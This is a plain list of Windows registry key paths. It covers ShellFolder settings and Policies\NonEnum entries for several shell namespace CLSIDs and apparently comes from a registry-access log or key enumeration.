HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{4336A54D-038B-4685-AB02-99BB52D3FB8B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{450D8FBA-AD25-11D0-98A8-0800361B1103}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{89D83576-6BD1-4C86-9454-BEB04E94C819}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{9343812E-1C37-4A49-A12E-4B2D810D956B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98D99750-0B8A-4c59-9151-589053683D73}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{98D99750-0B8A-4C59-9151-589053683D73}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\ShellFolder\HasNavigationEnum
